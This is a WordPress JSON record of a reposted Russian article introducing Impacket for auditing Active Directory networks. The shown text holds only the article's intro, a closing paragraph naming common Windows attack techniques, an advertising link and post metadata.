\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432 \u0442\u0432\u043e\u0440\u0447\u0435\u0441\u043a\u0438\u0445 \u043a\u043e\u0434\u0435\u0440\u0441\u043a\u0438\u0445 \u043c\u0443\u043a\u0430\u0445, \u0438\u0437\u043e\u0431\u0440\u0435\u0442\u0430\u044f \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0438\u043d\u0434\u0438\u0432\u0438\u0434\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0437\u0430\u0434\u0430\u0447. \u0412 \u043e\u0431\u0437\u043e\u0440\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u0438\u043a \u0430\u0442\u0430\u043a \u043d\u0430 Windows Server: <i>Golden Ticket, Silver Ticket, Kerberoast (Kerberoasting), Asreproast (AS-REP Roasting), NTLM Relay<\/i> \u2014 \u043a\u0430\u0436\u0434\u0430\u044f \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438 Impacket \u0441\u0440\u0435\u0434\u0438 \u043d\u0438\u0445 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u043e\u0439\u043d\u043e\u0435 \u043c\u0435\u0441\u0442\u043e.<\/p>\n<blockquote><p><b><font color=\"#3AC1EF\"><a href=\"https:\/\/habr.com\/ru\/specials\/744204\/\">\u0412\u044b\u0438\u0433\u0440\u0430\u0439 
\u0442\u0435\u043b\u0435\u0441\u043a\u043e\u043f \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043f\u0440\u0438\u0437\u044b \u0432 \u043a\u043e\u0441\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043a\u0432\u0438\u0437\u0435 \u043e\u0442 RUVDS. \u041f\u043e\u0435\u0445\u0430\u043b\u0438? ?<\/a><\/font><\/b><\/p><\/blockquote>\n<p><a href=\"http:\/\/ruvds.com\/ru-rub?utm_source=habr&amp;utm_medium=article&amp;utm_campaign=olegtsss&amp;utm_content=active_directory_glazami_impacket\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/webt\/_p\/_h\/lv\/_p_hlvd2tv0cv9tny8tdytzfhje.png\" data-src=\"https:\/\/habrastorage.org\/webt\/_p\/_h\/lv\/_p_hlvd2tv0cv9tny8tdytzfhje.png\"\/><\/a><\/div>\n<\/div>\n<\/div>\n<p> <!----> <!----><\/div>\n<p> <!----> <!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/companies\/ruvds\/articles\/743444\/\"> https:\/\/habr.com\/ru\/companies\/ruvds\/articles\/743444\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-1\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"><a href=\"https:\/\/habr.com\/ru\/company\/ruvds\/blog\/743444\/\"><\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/webt\/uw\/r2\/f1\/uwr2f11frwv_bhcznjhgaxq3eoe.png\" data-src=\"https:\/\/habrastorage.org\/webt\/uw\/r2\/f1\/uwr2f11frwv_bhcznjhgaxq3eoe.png\"\/><\/div>\n<p><\/a><br \/>  \u041f\u0440\u0438 \u0430\u0443\u0434\u0438\u0442\u0435 Windows-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440 <b><font color=\"#3AC1EF\">Impacket<\/font><\/b> \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0432\u0435\u0439\u0446\u0430\u0440\u0441\u043a\u0438\u043c \u043d\u043e\u0436\u043e\u043c, 
\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u043f\u043e \u0441\u0435\u0442\u0438, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u043e\u043f\u0440\u0438\u0435\u0442\u0430\u0440\u043d\u044b\u043c (\u0440\u043e\u0434\u043d\u044b\u043c \u0438\u043b\u0438 \u0443\u043c\u043e\u043b\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c) \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f, PowerShell. \u041d\u043e \u0442\u0430\u043a \u0443\u0436 \u0441\u043b\u043e\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0438\u0437-\u043f\u043e\u0434 Linux \u2013 \u043d\u0435 \u043b\u0443\u0447\u0448\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e open source \u0440\u0435\u0448\u0435\u043d\u0438\u0439. 
\u0411\u0443\u0434\u0443\u0447\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0432\u043e\u0437\u043b\u044e\u0431\u043b\u0435\u043d\u043d\u043e\u043c \u0432 IT-\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 Python, Impacket \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u044d\u043c\u043e\u0446\u0438\u0438 \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b, \u0430 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c \u0430\u0443\u0434\u0438\u0442, \u0441\u0442\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430. 
\u0426\u0435\u043b\u044c\u044e \u0441\u0442\u0430\u0442\u044c\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Active Directory, \u0438 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0438\u043b\u044c\u043d\u044b\u0435 \u0435\u0433\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b. \u0424\u043e\u0440\u043c\u0430\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u2013 \u043e\u0431\u0437\u043e\u0440 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0432 \u0435\u0433\u043e \u0441\u043e\u0441\u0442\u0430\u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0441 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u043d\u0430\u0438\u043c\u0435\u043d\u044c\u0448\u0435\u0439 \u043c\u0435\u0440\u0435 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f \u0438\u0437 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0445 \u0438\u043d\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0445 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439. 
\u0421\u0442\u0430\u0442\u044c\u044f \u043d\u043e\u0441\u0438\u0442 \u043e\u0431\u0437\u043e\u0440\u043d\u044b\u0439 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f Impacket, \u0438 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0432 \u0442\u0435\u043c\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0437\u043d\u0430\u043a\u043e\u043c \u0441 Windows Server \u043d\u0435 \u043f\u043e\u043d\u0430\u0441\u043b\u044b\u0448\u043a\u0435, \u0438 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u043c\u0438 \u0442\u043e\u043b\u043a\u043e\u043c \u0435\u0449\u0451 \u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f.  
<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-350117","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/350117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=350117"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/350117\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=350117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=350117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=350117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}